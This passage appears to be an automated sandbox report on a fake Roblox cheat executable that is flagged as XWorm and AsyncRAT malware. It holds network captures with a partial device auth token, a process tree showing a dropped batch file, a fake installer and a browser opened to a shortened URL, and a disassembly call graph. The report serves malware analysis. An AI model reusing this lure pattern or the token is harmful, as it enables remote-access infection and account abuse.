                                                                            Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: 4kpOeNohu0ukWZvI.2Context: 24fb880e02e957ff<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAX5uZNJtlCsrIwWSFkput0f6ptpjcGX11avNSdRXSVlgzhZDyMPl7VpkDAEqdEDq8ZPBs0WymhPstp95UHsw1FxIRuy3X0T8Of4sdYEpcprdou
                                                                            2024-07-29 22:58:18 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 34 6b 70 4f 65 4e 6f 68 75 30 75 6b 57 5a 76 49 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 34 66 62 38 38 30 65 30 32 65 39 35 37 66 66 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: 4kpOeNohu0ukWZvI.3Context: 24fb880e02e957ff<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                            2024-07-29 22:58:18 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                            Data Ascii: 202 1 CON 58
                                                                            2024-07-29 22:58:18 UTC58INData Raw: 4d 53 2d 43 56 3a 20 38 4b 4e 51 4b 54 7a 52 63 55 69 51 69 4e 62 49 48 45 35 52 4a 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                            Data Ascii: MS-CV: 8KNQKTzRcUiQiNbIHE5RJw.0Payload parsing failed.


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20192.168.2.65879740.113.110.67443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-07-29 22:59:09 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 49 69 74 47 41 68 49 75 4c 55 43 50 4b 37 75 4e 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 32 64 65 62 30 62 33 36 63 65 64 61 33 34 36 0d 0a 0d 0a
                                                                            Data Ascii: CNT 1 CON 305MS-CV: IitGAhIuLUCPK7uN.1Context: a2deb0b36ceda346
                                                                            2024-07-29 22:59:09 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                            2024-07-29 22:59:09 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 49 69 74 47 41 68 49 75 4c 55 43 50 4b 37 75 4e 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 32 64 65 62 30 62 33 36 63 65 64 61 33 34 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 35 75 5a 4e 4a 74 6c 43 73 72 49 77 57 53 46 6b 70 75 74 30 66 36 70 74 70 6a 63 47 58 31 31 61 76 4e 53 64 52 58 53 56 6c 67 7a 68 5a 44 79 4d 50 6c 37 56 70 6b 44 41 45 71 64 45 44 71 38 5a 50 42 73 30 57 79 6d 68 50 73 74 70 39 35 55 48 73 77 31 46 78 49 52 75 79 33 58 30 54 38 4f 66 34 73 64 59 45 70 63 70 72 64 6f 75
                                                                            Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: IitGAhIuLUCPK7uN.2Context: a2deb0b36ceda346<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAX5uZNJtlCsrIwWSFkput0f6ptpjcGX11avNSdRXSVlgzhZDyMPl7VpkDAEqdEDq8ZPBs0WymhPstp95UHsw1FxIRuy3X0T8Of4sdYEpcprdou
                                                                            2024-07-29 22:59:09 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 49 69 74 47 41 68 49 75 4c 55 43 50 4b 37 75 4e 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 32 64 65 62 30 62 33 36 63 65 64 61 33 34 36 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: IitGAhIuLUCPK7uN.3Context: a2deb0b36ceda346<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                            2024-07-29 22:59:10 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                            Data Ascii: 202 1 CON 58
                                                                            2024-07-29 22:59:10 UTC58INData Raw: 4d 53 2d 43 56 3a 20 44 39 34 70 46 30 54 63 4d 30 57 2b 5a 6d 6d 77 58 7a 38 51 72 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                            Data Ascii: MS-CV: D94pF0TcM0W+ZmmwXz8QrA.0Payload parsing failed.


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:0
                                                                            Start time:18:56:29
                                                                            Start date:29/07/2024
                                                                            Path:C:\Users\user\Desktop\cheat_roblox.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Users\user\Desktop\cheat_roblox.exe"
                                                                            Imagebase:0x7ff693e50000
                                                                            File size:2'675'335 bytes
                                                                            MD5 hash:D49B1A211CE49BED3E766471501819C6
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000003.2110891965.000001CD51F82000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000003.2110891965.000001CD51F82000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:2
                                                                            Start time:18:56:32
                                                                            Start date:29/07/2024
                                                                            Path:C:\Windows\System32\cmd.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\coin.bat" "
                                                                            Imagebase:0x7ff7e0370000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:3
                                                                            Start time:18:56:32
                                                                            Start date:29/07/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff66e660000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:4
                                                                            Start time:18:56:32
                                                                            Start date:29/07/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe"
                                                                            Imagebase:0xf40000
                                                                            File size:5'720'984 bytes
                                                                            MD5 hash:27469372591B14FF1C57654FACB5E020
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 0%, ReversingLabs
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:5
                                                                            Start time:18:56:45
                                                                            Start date:29/07/2024
                                                                            Path:C:\Windows\System32\cmd.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:cmd
                                                                            Imagebase:0x7ff7e0370000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:6
                                                                            Start time:18:56:45
                                                                            Start date:29/07/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff66e660000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:8
                                                                            Start time:18:56:46
                                                                            Start date:29/07/2024
                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6
                                                                            Imagebase:0x7ff684c40000
                                                                            File size:3'242'272 bytes
                                                                            MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:11
                                                                            Start time:18:56:47
                                                                            Start date:29/07/2024
                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1688 --field-trial-handle=1980,i,3286908272416009532,3896627819344561856,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                            Imagebase:0x7ff684c40000
                                                                            File size:3'242'272 bytes
                                                                            MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Disassembly

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:11.7%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:27.6%
                                                                              Total number of Nodes:2000
                                                                              Total number of Limit Nodes:26
                                                                              execution_graph 25780 7ff693e82d6c 25805 7ff693e827fc 25780->25805 25783 7ff693e82eb8 25904 7ff693e83170 7 API calls 2 library calls 25783->25904 25785 7ff693e82d88 __scrt_acquire_startup_lock 25786 7ff693e82ec2 25785->25786 25788 7ff693e82da6 25785->25788 25905 7ff693e83170 7 API calls 2 library calls 25786->25905 25789 7ff693e82dcb 25788->25789 25793 7ff693e82de8 __scrt_release_startup_lock 25788->25793 25813 7ff693e8cd90 25788->25813 25790 7ff693e82ecd abort 25792 7ff693e82e51 25817 7ff693e832bc 25792->25817 25793->25792 25901 7ff693e8c050 35 API calls __GSHandlerCheck_EH 25793->25901 25795 7ff693e82e56 25820 7ff693e8cd20 25795->25820 25906 7ff693e82fb0 25805->25906 25808 7ff693e8282b 25908 7ff693e8cc50 25808->25908 25811 7ff693e82827 25811->25783 25811->25785 25814 7ff693e8cdeb 25813->25814 25815 7ff693e8cdcc 25813->25815 25814->25793 25815->25814 25925 7ff693e51120 25815->25925 25988 7ff693e83cf0 25817->25988 25819 7ff693e832d3 GetStartupInfoW 25819->25795 25990 7ff693e90730 25820->25990 25822 7ff693e8cd2f 25823 7ff693e82e5e 25822->25823 25994 7ff693e90ac0 35 API calls _snwprintf 25822->25994 25825 7ff693e80754 25823->25825 25996 7ff693e6dfd0 25825->25996 25829 7ff693e8079a 26083 7ff693e7946c 25829->26083 25831 7ff693e807a4 __scrt_get_show_window_mode 26088 7ff693e79a14 25831->26088 25833 7ff693e80819 25834 7ff693e8096e GetCommandLineW 25833->25834 25883 7ff693e80ddc 25833->25883 25837 7ff693e80980 25834->25837 25877 7ff693e80b42 25834->25877 25835 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 25836 7ff693e80de2 25835->25836 26150 7ff693e87904 25836->26150 26155 7ff693e5129c 25837->26155 25839 7ff693e80b51 25844 7ff693e51fa0 31 API calls 25839->25844 25851 7ff693e80b68 BuildCatchObjectHelperInternal 25839->25851 25843 7ff693e809a5 26165 7ff693e7cad0 103 API calls 3 library calls 25843->26165 25844->25851 25848 7ff693e80b93 SetEnvironmentVariableW GetLocalTime 26115 7ff693e63e28 25848->26115 26110 7ff693e51fa0 25851->26110 25853 7ff693e809af 25853->25836 25854 7ff693e80adb 25853->25854 25855 7ff693e809f9 OpenFileMappingW 25853->25855 25863 7ff693e5129c 33 API calls 25854->25863 25858 7ff693e80a19 MapViewOfFile 25855->25858 25859 7ff693e80ad0 CloseHandle 25855->25859 25858->25859 25861 7ff693e80a3f UnmapViewOfFile MapViewOfFile 25858->25861 25859->25877 25861->25859 25864 7ff693e80a71 25861->25864 25862 7ff693e80c75 26143 7ff693e767b4 25862->26143 25866 7ff693e80b00 25863->25866 26166 7ff693e7a190 33 API calls 2 library calls 25864->26166 26170 7ff693e7fd0c 35 API calls 2 library calls 25866->26170 25870 7ff693e80a81 26167 7ff693e7fd0c 35 API calls 2 library calls 25870->26167 25871 7ff693e767b4 33 API calls 25874 7ff693e80c87 DialogBoxParamW 25871->25874 25872 7ff693e80b0a 25872->25877 25878 7ff693e80dd7 25872->25878 25884 7ff693e80cd3 25874->25884 25875 7ff693e80a90 26168 7ff693e6b9b4 102 API calls 25875->26168 26098 7ff693e66454 25877->26098 25881 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 25878->25881 25879 7ff693e80aa5 26169 7ff693e6bb00 102 API calls 25879->26169 25881->25883 25882 7ff693e80ab8 25887 7ff693e80ac7 UnmapViewOfFile 25882->25887 25883->25835 25885 7ff693e80cec 25884->25885 25886 7ff693e80ce6 Sleep 25884->25886 25888 7ff693e80cfa 25885->25888 26171 7ff693e79f4c 49 API calls 2 library calls 25885->26171 25886->25885 25887->25859 25890 7ff693e80d06 DeleteObject 25888->25890 25891 7ff693e80d25 25890->25891 25892 7ff693e80d1f DeleteObject 25890->25892 25893 7ff693e80d6d 25891->25893 25894 7ff693e80d5b 25891->25894 25892->25891 26146 7ff693e794e4 25893->26146 26172 7ff693e7fe24 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 25894->26172 25897 7ff693e80d60 CloseHandle 25897->25893 25901->25792 25904->25786 25905->25790 25907 7ff693e8281e __scrt_dllmain_crt_thread_attach 25906->25907 25907->25808 25907->25811 25909 7ff693e90d4c 25908->25909 25910 7ff693e82830 25909->25910 25913 7ff693e8ec00 25909->25913 25910->25811 25912 7ff693e851a0 7 API calls 2 library calls 25910->25912 25912->25811 25924 7ff693e8f398 EnterCriticalSection 25913->25924 25930 7ff693e591c8 25925->25930 25929 7ff693e82a01 25929->25815 25938 7ff693e656a4 25930->25938 25932 7ff693e591df 25941 7ff693e6b788 25932->25941 25936 7ff693e51130 25937 7ff693e829bc 34 API calls 25936->25937 25937->25929 25947 7ff693e656e8 25938->25947 25956 7ff693e513a4 25941->25956 25944 7ff693e59a28 25945 7ff693e656e8 2 API calls 25944->25945 25946 7ff693e59a36 25945->25946 25946->25936 25948 7ff693e656fe __scrt_get_show_window_mode 25947->25948 25951 7ff693e6eba4 25948->25951 25954 7ff693e6eb58 GetCurrentProcess GetProcessAffinityMask 25951->25954 25955 7ff693e656de 25954->25955 25955->25932 25957 7ff693e513ad 25956->25957 25965 7ff693e5142d 25956->25965 25958 7ff693e5143d 25957->25958 25960 7ff693e513ce 25957->25960 25976 7ff693e52018 33 API calls std::_Xinvalid_argument 25958->25976 25963 7ff693e513db __scrt_get_show_window_mode 25960->25963 25966 7ff693e821d0 25960->25966 25975 7ff693e5197c 31 API calls _invalid_parameter_noinfo_noreturn 25963->25975 25965->25944 25967 7ff693e821db 25966->25967 25968 7ff693e821f4 25967->25968 25970 7ff693e821fa 25967->25970 25977 7ff693e8bbc0 25967->25977 25968->25963 25973 7ff693e82205 25970->25973 25980 7ff693e82f7c RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 25970->25980 25981 7ff693e51f80 33 API calls 3 library calls 25973->25981 25974 7ff693e8220b 25975->25965 25982 7ff693e8bc00 25977->25982 25980->25973 25981->25974 25987 7ff693e8f398 EnterCriticalSection 25982->25987 25989 7ff693e83cd0 25988->25989 25989->25819 25989->25989 25991 7ff693e90749 25990->25991 25992 7ff693e9073d 25990->25992 25991->25822 25995 7ff693e90570 48 API calls 4 library calls 25992->25995 25994->25822 25995->25991 26173 7ff693e82450 25996->26173 25999 7ff693e6e07b 26001 7ff693e6e503 25999->26001 26215 7ff693e8b788 39 API calls 2 library calls 25999->26215 26000 7ff693e6e026 GetProcAddress 26002 7ff693e6e03b 26000->26002 26003 7ff693e6e053 GetProcAddress 26000->26003 26005 7ff693e66454 34 API calls 26001->26005 26002->26003 26003->25999 26006 7ff693e6e068 26003->26006 26008 7ff693e6e50c 26005->26008 26006->25999 26007 7ff693e6e3b0 26007->26001 26009 7ff693e6e3ba 26007->26009 26175 7ff693e67df4 26008->26175 26011 7ff693e66454 34 API calls 26009->26011 26012 7ff693e6e3c3 CreateFileW 26011->26012 26014 7ff693e6e403 SetFilePointer 26012->26014 26015 7ff693e6e4f0 CloseHandle 26012->26015 26014->26015 26016 7ff693e6e41c ReadFile 26014->26016 26017 7ff693e51fa0 31 API calls 26015->26017 26016->26015 26018 7ff693e6e444 26016->26018 26017->26001 26019 7ff693e6e458 26018->26019 26020 7ff693e6e800 26018->26020 26025 7ff693e5129c 33 API calls 26019->26025 26231 7ff693e82624 8 API calls 26020->26231 26022 7ff693e6e805 26023 7ff693e6e53e CompareStringW 26027 7ff693e6e51a 26023->26027 26024 7ff693e5129c 33 API calls 26024->26027 26036 7ff693e6e48f 26025->26036 26027->26023 26027->26024 26029 7ff693e51fa0 31 API calls 26027->26029 26060 7ff693e6e5cc 26027->26060 26183 7ff693e651a4 26027->26183 26188 7ff693e68090 26027->26188 26192 7ff693e632bc 26027->26192 26029->26027 26030 7ff693e6e648 26217 7ff693e67eb0 47 API calls 26030->26217 26031 7ff693e6e7c2 26035 7ff693e51fa0 31 API calls 26031->26035 26033 7ff693e6e4db 26037 7ff693e51fa0 31 API calls 26033->26037 26039 7ff693e6e7cb 26035->26039 26036->26033 26216 7ff693e6d0a0 33 API calls 26036->26216 26040 7ff693e6e4e5 26037->26040 26038 7ff693e6e651 26041 7ff693e651a4 9 API calls 26038->26041 26043 7ff693e51fa0 31 API calls 26039->26043 26044 7ff693e51fa0 31 API calls 26040->26044 26045 7ff693e6e656 26041->26045 26042 7ff693e5129c 33 API calls 26042->26060 26046 7ff693e6e7d5 26043->26046 26044->26015 26047 7ff693e6e706 26045->26047 26054 7ff693e6e661 26045->26054 26206 7ff693e82320 26046->26206 26051 7ff693e6da98 48 API calls 26047->26051 26048 7ff693e68090 47 API calls 26048->26060 26052 7ff693e6e74b AllocConsole 26051->26052 26055 7ff693e6e755 GetCurrentProcessId AttachConsole 26052->26055 26056 7ff693e6e6fb 26052->26056 26053 7ff693e51fa0 31 API calls 26053->26060 26218 7ff693e6aae0 26054->26218 26057 7ff693e6e76c 26055->26057 26230 7ff693e519e0 31 API calls _invalid_parameter_noinfo_noreturn 26056->26230 26066 7ff693e6e778 GetStdHandle WriteConsoleW Sleep FreeConsole 26057->26066 26058 7ff693e632bc 51 API calls 26058->26060 26060->26042 26060->26048 26060->26053 26060->26058 26063 7ff693e6e63a 26060->26063 26063->26030 26063->26031 26064 7ff693e6e7b9 ExitProcess 26066->26056 26068 7ff693e6aae0 48 API calls 26069 7ff693e6e6ce 26068->26069 26228 7ff693e6dc2c 33 API calls 26069->26228 26071 7ff693e6e6da 26229 7ff693e519e0 31 API calls _invalid_parameter_noinfo_noreturn 26071->26229 26073 7ff693e662dc GetCurrentDirectoryW 26074 7ff693e66300 26073->26074 26079 7ff693e6638d 26073->26079 26075 7ff693e513a4 33 API calls 26074->26075 26076 7ff693e6631b GetCurrentDirectoryW 26075->26076 26077 7ff693e66341 26076->26077 26433 7ff693e520b0 26077->26433 26079->25829 26080 7ff693e6634f 26080->26079 26081 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26080->26081 26082 7ff693e663a9 26081->26082 26084 7ff693e6dd88 26083->26084 26085 7ff693e79481 OleInitialize 26084->26085 26086 7ff693e794a7 26085->26086 26087 7ff693e794cd SHGetMalloc 26086->26087 26087->25831 26089 7ff693e79a49 26088->26089 26091 7ff693e79a4e BuildCatchObjectHelperInternal 26088->26091 26090 7ff693e51fa0 31 API calls 26089->26090 26090->26091 26092 7ff693e51fa0 31 API calls 26091->26092 26093 7ff693e79a7d BuildCatchObjectHelperInternal 26091->26093 26092->26093 26094 7ff693e51fa0 31 API calls 26093->26094 26096 7ff693e79aac BuildCatchObjectHelperInternal 26093->26096 26094->26096 26095 7ff693e51fa0 31 API calls 26097 7ff693e79adb BuildCatchObjectHelperInternal 26095->26097 26096->26095 26096->26097 26097->25833 26099 7ff693e513a4 33 API calls 26098->26099 26100 7ff693e66489 26099->26100 26101 7ff693e6648c GetModuleFileNameW 26100->26101 26104 7ff693e664dc 26100->26104 26102 7ff693e664a7 26101->26102 26103 7ff693e664de 26101->26103 26102->26100 26103->26104 26105 7ff693e5129c 33 API calls 26104->26105 26107 7ff693e66506 26105->26107 26106 7ff693e6653e 26106->25839 26107->26106 26108 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26107->26108 26109 7ff693e66560 26108->26109 26111 7ff693e51fb3 26110->26111 26112 7ff693e51fdc 26110->26112 26111->26112 26113 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26111->26113 26112->25848 26114 7ff693e52000 26113->26114 26116 7ff693e63e4d swprintf 26115->26116 26117 7ff693e89ef0 swprintf 46 API calls 26116->26117 26118 7ff693e63e69 SetEnvironmentVariableW GetModuleHandleW LoadIconW 26117->26118 26119 7ff693e7b014 LoadBitmapW 26118->26119 26120 7ff693e7b03e 26119->26120 26124 7ff693e7b046 26119->26124 26438 7ff693e78624 FindResourceW 26120->26438 26122 7ff693e7b063 26452 7ff693e7849c 26122->26452 26123 7ff693e7b04e GetObjectW 26123->26122 26124->26122 26124->26123 26127 7ff693e7b0ce 26138 7ff693e698ac 26127->26138 26128 7ff693e7b09e 26457 7ff693e78504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26128->26457 26129 7ff693e78624 10 API calls 26131 7ff693e7b08a 26129->26131 26131->26128 26134 7ff693e7b092 DeleteObject 26131->26134 26132 7ff693e7b0a7 26458 7ff693e784cc 26132->26458 26134->26128 26137 7ff693e7b0bf DeleteObject 26137->26127 26465 7ff693e698dc 26138->26465 26140 7ff693e698ba 26532 7ff693e6a43c GetModuleHandleW FindResourceW 26140->26532 26142 7ff693e698c2 26142->25862 26144 7ff693e821d0 33 API calls 26143->26144 26145 7ff693e767fa 26144->26145 26145->25871 26147 7ff693e79501 26146->26147 26148 7ff693e7950a OleUninitialize 26147->26148 26149 7ff693ebe330 26148->26149 26614 7ff693e8783c 31 API calls 3 library calls 26150->26614 26152 7ff693e8791d 26615 7ff693e87934 16 API calls abort 26152->26615 26156 7ff693e5139b 26155->26156 26157 7ff693e512d0 26155->26157 26617 7ff693e52004 33 API calls std::_Xinvalid_argument 26156->26617 26160 7ff693e51396 26157->26160 26161 7ff693e51338 26157->26161 26164 7ff693e512de BuildCatchObjectHelperInternal 26157->26164 26616 7ff693e51f80 33 API calls 3 library calls 26160->26616 26163 7ff693e821d0 33 API calls 26161->26163 26161->26164 26163->26164 26164->25843 26165->25853 26166->25870 26167->25875 26168->25879 26169->25882 26170->25872 26171->25888 26172->25897 26174 7ff693e6dff4 GetModuleHandleW 26173->26174 26174->25999 26174->26000 26176 7ff693e67e0c 26175->26176 26177 7ff693e67e23 26176->26177 26178 7ff693e67e55 26176->26178 26180 7ff693e5129c 33 API calls 26177->26180 26232 7ff693e5704c 47 API calls BuildCatchObjectHelperInternal 26178->26232 26182 7ff693e67e47 26180->26182 26181 7ff693e67e5a 26182->26027 26184 7ff693e651c8 GetVersionExW 26183->26184 26185 7ff693e651fb 26183->26185 26184->26185 26186 7ff693e82320 _handle_error 8 API calls 26185->26186 26187 7ff693e65228 26186->26187 26187->26027 26189 7ff693e680a5 26188->26189 26233 7ff693e68188 26189->26233 26191 7ff693e680ca 26191->26027 26193 7ff693e632e7 GetFileAttributesW 26192->26193 26194 7ff693e632e4 26192->26194 26195 7ff693e632f8 26193->26195 26202 7ff693e63375 26193->26202 26194->26193 26242 7ff693e66a0c 26195->26242 26196 7ff693e82320 _handle_error 8 API calls 26198 7ff693e63389 26196->26198 26198->26027 26200 7ff693e6333c 26200->26202 26203 7ff693e63399 26200->26203 26201 7ff693e63323 GetFileAttributesW 26201->26200 26202->26196 26204 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26203->26204 26205 7ff693e6339e 26204->26205 26207 7ff693e82329 26206->26207 26208 7ff693e82550 IsProcessorFeaturePresent 26207->26208 26209 7ff693e6e7e4 26207->26209 26210 7ff693e82568 26208->26210 26209->26073 26332 7ff693e82744 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 26210->26332 26212 7ff693e8257b 26333 7ff693e82510 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 26212->26333 26215->26007 26216->26036 26217->26038 26219 7ff693e6aaf3 26218->26219 26334 7ff693e69774 26219->26334 26222 7ff693e6ab58 LoadStringW 26223 7ff693e6ab86 26222->26223 26224 7ff693e6ab71 LoadStringW 26222->26224 26225 7ff693e6da98 26223->26225 26224->26223 26360 7ff693e6d874 26225->26360 26228->26071 26229->26056 26230->26064 26231->26022 26232->26181 26234 7ff693e68326 26233->26234 26237 7ff693e681ba 26233->26237 26241 7ff693e5704c 47 